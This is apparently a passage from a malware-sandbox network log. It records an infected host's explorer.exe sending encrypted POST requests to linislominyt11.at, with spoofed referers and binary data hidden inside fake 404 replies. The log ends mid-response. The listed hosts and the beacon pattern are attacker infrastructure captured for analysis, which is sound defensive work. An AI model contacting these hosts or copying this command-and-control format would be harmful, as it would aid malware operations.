Jun 29, 2022 23:11:22.416168928 CEST	1328	IN	Data Raw: 08 0f 05 ee 96 14 65 fe 2a 3b 30 12 53 0d 1c 36 a7 f4 6d bf d6 91 69 2c 0d af 51 03 9c 4f e4 60 b9 57 54 0c e1 6a 5b 24 2a 3e da 0c e1 6a 74 3b ec 00 74 50 3e de 77 68 78 6c eb b4 dd 8d 38 3c e4 e3 91 a2 6a 85 5f 97 90 ce 6e cb 5e c3 b9 48 d2 4d Data Ascii: e;0S6mi,QO`WTj[$>jt;tP>whxl8<j_n^HMD];iii.Ip3d4>xl&$)Q6$Bq`Gk5s_rRP?ah(g`7jUNNQ")sT9kRQQ]#
Jun 29, 2022 23:11:22.441237926 CEST	1329	IN	Data Raw: ba 82 44 6f 79 68 6a 55 ce 15 c9 4a 91 1b 3f e5 4f 62 b2 38 eb 94 c8 79 37 e6 95 dc 66 c1 96 e0 9a 60 00 15 f3 24 7a b2 bd e5 56 9b ba 32 de 8c 7c 4e 7f e5 91 a0 05 75 8b 63 65 c9 6e e5 cd 93 49 7f 4d 80 ec 7b d7 6b 33 4b 1d 09 31 ca b6 06 c8 62 Data Ascii: DoyhjUJ?Ob8y7f`$zV2\|NucenIM{k3K1b*'rAP_.d8o&--fOVt8GN1\|7J6=\[(9,:P}7KqIEtph(79BoE(]t]_er8\|75X~wx'AdY>)2jJzM":;o
Jun 29, 2022 23:11:23.204335928 CEST	1331	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 19 00 00 00 1d 3d 5a e5 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 81 a1 55 00 37 ca 03 00 34 6f 8a 38 01 00 00 00 02 00 9c 03 00 00 0b c7 2c d9 be ef eb d2 bd 2e c3 67 08 06 02 00 40 eb c6 2e f0 6e ee d7 e9 bd f9 83 e3 fa 59 39 e6 76 88 b3 a1 01 bf 7d 48 17 e1 72 38 42 66 6e fd db 9f 15 05 ab 70 0b d5 82 12 70 ec e7 c1 ff 16 2a 96 7d 51 48 1f fa dc 42 85 ec 43 68 33 db 77 1e 9a 81 29 70 b3 46 06 9e d1 12 e5 06 3e 74 24 f7 32 37 ee ba 23 ee f5 6b fa 15 25 df 9d 08 31 c3 f6 6e 7e f5 e8 b0 59 f7 78 c7 30 68 85 3b 23 5d 01 09 b8 6e c2 17 d7 33 60 0a 44 17 75 7e 1d 99 98 81 c4 1d 96 cd ff 9e f8 ea 68 1f 79 de e5 d7 07 69 9e cc 31 79 ad 23 2e ad be cb 30 ab 72 a9 fd bb d6 02 59 9c 8d 4d eb 6b 0e cf fe 5e 64 99 f6 34 66 48 3d f7 db ec ea 8a c8 ff 70 a6 cb d4 20 6e 0c 06 d6 a0 00 66 2f c9 4a 1c 54 f7 d9 91 47 37 d3 64 d7 c1 c0 72 f1 05 fd b0 80 3d 13 24 a6 91 f2 1a 01 ce 40 9f ff 96 7f 28 5f fa 98 f2 5b e9 1e c2 1a 23 de bb 50 bc 7c 3d 59 f4 87 43 79 1d 39 c9 7a 61 c9 02 34 15 01 74 7d a9 05 84 bb 61 ce 24 5a ba ec 10 aa 1b d2 c0 09 15 16 f9 9f 57 cc 0e 41 fd a7 12 6b a3 c0 1c 33 ba 1a 5d 3f ac 4d 0a 15 b0 68 2b a1 af c5 fd 75 58 fb 96 a7 88 32 2e fa c8 53 43 96 d9 1c 94 e7 e7 89 44 aa bb 53 50 cb a4 b7 49 c6 9f a4 1f d4 da b3 cb ac 66 84 6f 45 b0 71 fa 9c 7b 5d 83 cb ad 6b 12 db 6e 53 62 1c 71 69 87 b6 43 b4 c9 eb c1 30 85 5b d6 06 3f bf 50 a3 4d eb 4b 22 f7 6a 71 15 37 47 4c ff 29 7f 81 ec d0 04 92 bb fd 3d f7 d9 5c b2 13 60 c7 b2 d4 db e1 60 43 83 27 90 b4 9a 69 ec d8 fd fe 0f 77 ac 28 6b dc 47 8b a5 0f c9 f6 de 42 74 d4 ce 4f 65 3f 31 fe 7e a7 db 55 a4 8f c1 bd 29 5a e3 96 99 24 71 dd 67 7f cf 4e 85 88 08 b0 7d a3 11 c5 33 58 68 96 3a c4 ae 68 f7 db f3 e0 98 ac 93 f8 17 55 8c d0 cd 54 3f 64 70 5c 23 ae b5 39 8f f2 13 23 0b a1 50 b9 8a 34 e5 4a 2e da 9e 1c b4 62 fc 53 d7 03 98 df ef d9 93 f4 26 07 44 37 ad 17 4e 47 5a ec 23 37 56 34 9b 05 0a 67 9a b5 fe 79 c4 ec 97 d1 f8 7e 96 1f c8 a9 f8 3c 17 66 84 2a fc c6 57 50 82 d5 e8 a1 74 bf 71 bf 36 54 94 86 a9 62 40 1d b8 f1 f1 77 aa 36 4b 89 de b7 01 a1 0b d8 7f cd 37 49 8b b1 11 44 0d b6 70 7d dc 33 66 8c ac d5 87 27 bd e6 d8 d2 26 60 17 47 58 3f bc 42 bb 56 3c f9 ce 8b 2a eb 95 78 bd ae db 35 ac 35 d4 bc 24 3a 8a 21 95 db 9e 9a 2d 00 53 6b 8c c5 e4 10 ae 5e f2 06 40 6e 5c 72 aa 78 ea 25 ed 76 40 15 bb 8e 0e 97 6d 57 87 ae f9 32 7f f6 f8 f5 d2 ea 62 b0 bf 0d a0 93 5e a1 e5 c6 61 dd 49 29 77 d2 dd e1 24 96 1d c0 31 b3 99 25 9a 65 af 6f 6b ad 68 ec 4c 33 30 f8 e5 c5 76 45 98 2f a2 ae ab 3d 11 59 6c 44 8d b2 7b f4 67 b9 9b 37 da 06 41 48 04 b0 22 6f 4c 8e 73 38 51 b0 be 92 30 ff a0 26 51 6b 9d d0 df 69 97 46 7d a5 2e 81 e7 61 fa 7c 75 a1 71 3f 7a f0 cb ab ff 70 ad c3 2a 29 db 6f 97 d0 d4 90 61 97 13 f0 7f 9c 83 c7 48 1e ef 26 f1 d4 14 3f 17 26 da f9 60 de ac 18 d5 20 aa 5b 54 47 8f 5f f9 bd 6d cd 7c 9d d3 78 7f 38 6e da ed 6d 1f 99 0f e0 22 92 ee 66 98 f7 72 ab c0 0b 97 d1 ce c9 dd fb 2c e1 31 79 ba 7c 34 a7 5b 0c e4 95 e1 2a a1 87 a2 74 6c 63 03 ba dd 49 d5 13 2f fa 2f 29 0f 98 7f 44 bd cb d0 26 94 b2 09 7e cf d9 3e 48 a1 37 b6 c1 be 15 9d 6d 5a 86 35 a9 3d 95 85 5b af 40 5e fd 10 0c 67 dc 5b b6 92 ad 94 c5 42 e9 a4 61 d0 12 c9 3c 39 f5 71 04 60 45 a8 ca 82 45 59 46 2f 09 7d 48 a3 49 04 0f 63 b1 40 11 d9 bc ee 1a 32 70 75 de 70 7d c2 61 5b 7a 6f f1 de 88 81 b6 53 d0 df c2 70 27 2d 5e 90 cc 9d de 40 22 f1 58 59 5e bb bd 59 a4 8d 4c e0 b7 d1 97 09 97 f2 22 ee 00 fb 91 8b ba d6 4b 81 d9 a5 bf 96 70 55 48 72 2a 05 09 5d 4c 8e ad 71 40 9b ef 4e 37 c3 1f 91 b6 7e 6a 72 5f 1e f2 46 60 6e 70 d1 da 50 3f 04 60 87 fe e6 18 22 84 2f c4 f1 ab a3 3d 3e Data Ascii: =Zq <`~E&oCU74o8,.g@.nY9v}Hr8Bfnpp}QHBCh3w)pF>t$27#k%1n~Yx0h;#]n3`Du~hyi1y#.0rYMk^d4fH=p nf/JTG7dr=$@(_[#P\|=YCy9za4t}a$ZWAk3]?Mh+uX2.SCDSPIfoEq{]knSbqiC0[?PMK"jq7GL)=\``C'iw(kGBtOe?1~U)Z$qgN}3Xh:hUT?dp\#9#P4J.bS&D7NGZ#7V4gy~<fWPtq6Tb@w6K7IDp}3f'&`GX?BV<x55$:!-Sk^@n\rx%v@mW2b^aI)w$1%eokhL30vE/=YlD{g7AH"oLs8Q0&QkiF}.a\|uq?zp)oaH&?&` [TG_m\|x8nm"fr,1y\|4[tlcI//)D&~>H7mZ5=[@^g[Ba<9q`EEYF/}HIc@2pup}a[zoSp'-^@"XY^YL"KpUHr]Lq@N7~jr_F`npP?`"/=>
Jun 29, 2022 23:11:23.642194033 CEST	1332	IN	Data Raw: 7b 5e 44 e4 f0 1c 17 3c 7f dd e5 4d 60 08 30 70 36 f4 23 ba 9c 9c 11 f9 58 77 14 99 2f 09 18 4f 20 54 f1 2e 6c 69 ad 69 16 7a d0 94 27 cf 08 c0 1b 6b 56 f9 60 30 ba d9 75 15 23 87 e9 76 3a ca 5c 42 40 fa ee 34 e0 aa ea 03 a9 b7 e7 76 b6 16 d4 fc Data Ascii: {^D<M`0p6#Xw/O T.liiz'kV`0u#v:\B@4v> hoLf+6vO{f2AM2`LeSpCx@HJr]7>wUUL"4.@?kR@Vo?gxRG*jOF0z3)Ab?._c}
Jun 29, 2022 23:11:23.668878078 CEST	1333	IN	Data Raw: 7d 44 dd d6 6e 16 ca 70 34 b7 07 9c 75 53 fe 5e a0 7f 98 f5 47 db 73 39 5d 78 f5 f8 2f 5c 13 b5 cf aa a6 f9 37 a3 23 e6 95 2f 14 df 66 21 68 57 d5 cf 25 73 71 51 f1 1d 41 58 2b 33 ce 27 9b 2b 07 7d 1e f7 22 b4 ca 9d 95 d7 c1 fb 51 f4 ca 18 75 dd Data Ascii: }Dnp4uS^Gs9]x/\7#/f!hW%sqQAX+3'+}"Qunp_V<\Wxa,bT\|+cJNWuqEClAux\h> \];HB,l`y][[!Tj1QU}U;%CbI\|sb
Jun 29, 2022 23:11:23.693659067 CEST	1335	IN	Data Raw: 08 0f 05 ee 96 14 65 fe 2a 3b 30 12 53 0d 1c 36 a7 f4 6d bf d6 91 69 2c 0d af 51 03 9c 4f e4 60 b9 57 54 0c e1 6a 5b 24 2a 3e da 0c e1 6a 74 3b ec 00 74 50 3e de 77 68 78 6c eb b4 dd 8d 38 3c e4 e3 91 a2 6a 85 5f 97 90 ce 6e cb 5e c3 b9 48 d2 4d Data Ascii: e;0S6mi,QO`WTj[$>jt;tP>whxl8<j_n^HMD];iii.Ip3d4>xl&$)Q6$Bq`Gk5s_rRP?ah(g`7jUNNQ")sT9kRQQ]#
Jun 29, 2022 23:11:23.717437029 CEST	1336	IN	Data Raw: 64 01 8f d5 5e 05 25 e5 b6 75 ff 90 c5 58 f4 53 e7 f5 fe d8 df 79 2b 56 74 fd 66 1b 6d e0 b2 1a 58 81 5a 53 1a fe c6 e8 bc 07 db 34 7c 08 1c 0e 9c 4f 33 e4 35 83 91 78 87 95 27 9e 0a d3 a7 fc f8 8b 91 a2 27 f0 cb e0 99 aa 43 2e ea 3a ca 80 6d 83 Data Ascii: d^%uXSy+VtfmXZS4\|O35x''C.:m0f_x&r4_J\| P~9Uc4GJz0ffu;:5$^<mqa<K\|Kz V(/XbFn -tN\|-c$$
Jun 29, 2022 23:11:23.741122007 CEST	1338	IN	Data Raw: 00 ec 29 cf 7e ad 38 a5 a3 35 66 4a 67 31 98 cc d4 b6 23 45 9b 7b 5c 0e a7 46 b8 22 75 25 67 6b 01 3f 74 84 72 28 01 18 d2 3a 7b 76 b4 21 b4 70 0e 74 4f fe 05 c8 2e ff 5f 7d 6d 05 be c6 15 07 94 ea 1c 67 d1 00 11 55 c3 40 85 24 a1 ba d4 14 52 b7 Data Ascii: )~85fJg1#E{\F"u%gk?tr(:{v!ptO._}mgU@$R8(NV)m,. <KBkBJA^LnRxA-rzC/!ow"9?@g&^TbTg}p\LdQyLj=!cBqKcx@]$gQ;QPI7?cYwd
Jun 29, 2022 23:11:23.770092964 CEST	1339	IN	Data Raw: 33 4d f8 96 32 cf 48 84 02 b4 02 a3 a0 5e 43 53 da c7 0e 5d cb 8f 50 07 8b ec f0 e3 4a 3a f2 da 9e 9d 20 5b 3a 10 fe 02 c1 20 00 bf 62 ba 3c 12 b4 e5 2e be 34 3e 24 2f c0 c5 ad 99 50 97 70 f6 6f 43 b6 9b e5 18 45 aa 80 09 07 b9 cb 12 65 15 39 47 Data Ascii: 3M2H^CS]PJ: [: b<.4>$/PpoCEe9Gb`/Y1P-B#m>VkA`?Y\~f0h4QFXl7HVv~C4i$d%Y@]t'L-z=3UP(o~K}7GN
Jun 29, 2022 23:11:24.921134949 CEST	1341	IN	Data Raw: ef ac fb 4b 5c f0 21 36 f0 6b 7f c1 a6 a4 e5 1b e2 c9 94 44 d8 ae ab 91 6e c6 78 61 6b f0 b9 f5 ad f6 d7 e0 c2 e5 66 43 22 21 5e 98 ae a0 a2 17 71 55 ad 53 2b 23 87 70 93 5b 9d 84 4c af 58 86 49 80 69 ad c5 3e 32 c4 8e 6a cf 5d 65 cb 23 de b2 e2 Data Ascii: K\!6kDnxakfC"!^qUS+#p[LXIi>2j]e#CAuB1k!vo^,***~SOzR:;\M2FS7"#ck_WdrFFq(\1xxF)w2&~H>rc#{0<9dM&D!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49765	211.53.230.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:46.301862955 CEST	9885	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kkxkj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: linislominyt11.at
Jun 29, 2022 23:11:46.305546999 CEST	9885	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 e0 e6 1f e1 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO!YD@bk=<1IM9MjU"2bxM4I5f1BnwS@H0pF>BH.W~Y
Jun 29, 2022 23:11:47.345630884 CEST	9886	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49766	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:48.128952980 CEST	9887	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qgetqklgt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: linislominyt11.at
Jun 29, 2022 23:11:48.128974915 CEST	9887	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 e4 b4 4a ff Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOJa%5<pX&b6:v6B#%5s>Bwr4bf!EJ/cC~CtB>GxB/G0\|4s
Jun 29, 2022 23:11:48.809906006 CEST	9888	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qgetqklgt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: linislominyt11.at Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 e4 b4 4a ff 8e 80 61 f7 81 e8 25 dc ff a6 f8 8f d9 35 8a 02 3c 98 fe 70 02 aa c7 07 58 26 af 06 ed 62 36 e9 83 3a 8d 10 76 08 36 93 13 da a8 bc f7 eb dc b3 99 06 42 f5 23 c7 d6 f6 bb ff f2 ac 25 35 14 d8 a2 e2 73 c1 d3 a2 0c 3e c6 8c 98 f9 a0 15 42 c6 f1 96 ce e1 77 72 34 62 66 cf 88 21 0b c9 45 c1 10 0a e4 c8 1d f9 ca 4a 10 2f e6 63 0d a2 00 e7 43 c9 7e b1 d8 b7 be af c9 43 d9 1a 74 42 2a aa 15 8a 3e 92 c4 07 47 80 78 8e 1b c2 ec 42 e1 2f 9b 47 08 30 7c 9e 2a 34 b5 05 ae e8 73 97 fc 81 ac e5 56 39 52 4c 46 d1 6b ab 66 82 ea 36 4c 3a 73 dc 70 0b d2 ec 8b 01 7c 7c 34 03 3f 88 31 fb 32 89 37 42 d6 3b 30 dc 30 ec da 17 49 8b 6c df e2 ff 66 17 0f 40 f1 75 2a e7 2c e0 b4 53 7a 10 95 cf 24 f1 ba fe 76 f2 23 0d 6e 2b f1 43 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOJa%5<pX&b6:v6B#%5s>Bwr4bf!EJ/cC~CtB>GxB/G0\|4sV9RLFkf6L:sp\|\|4?127B;00Ilf@u*,Sz$v#n+C
Jun 29, 2022 23:11:50.788711071 CEST	9888	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Jun 29, 2022 23:11:51.457608938 CEST	9890	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49767	211.53.230.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:51.127032042 CEST	9889	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://unkcndrk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: linislominyt11.at
Jun 29, 2022 23:11:51.127039909 CEST	9890	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b8 8a 14 62 cd d6 4f 96 bc c9 2d a1 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO-tmmNE=&q}G[+<$hzP(6:3[id(q}u0W%mB7v6!E2c5!U5RV
Jun 29, 2022 23:11:51.905477047 CEST	9891	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 1c d0 46 db fa 0c a2 3f f8 2e 44 17 34 ff 6b 4b 71 9c 54 26 0a 7d 9e ae 8c ae da 29 c1 28 2f 40 35 Data Ascii: Uys/~(u:RF?.D4kKqT&})(/@5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49769	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:55.395486116 CEST	10186	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ydqkvjmc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: linislominyt11.at
Jun 29, 2022 23:11:55.398355007 CEST	10186	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 b8 8a 14 62 cc d6 4f 96 a7 df 41 de Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOA'hK?'f?b&x?e#MZx>]^:k^/U3Gs4/`cbtpA:ZQFg!SX-.:#CD
Jun 29, 2022 23:11:58.474776983 CEST	10252	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Jun 29, 2022 23:11:59.340884924 CEST	10254	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 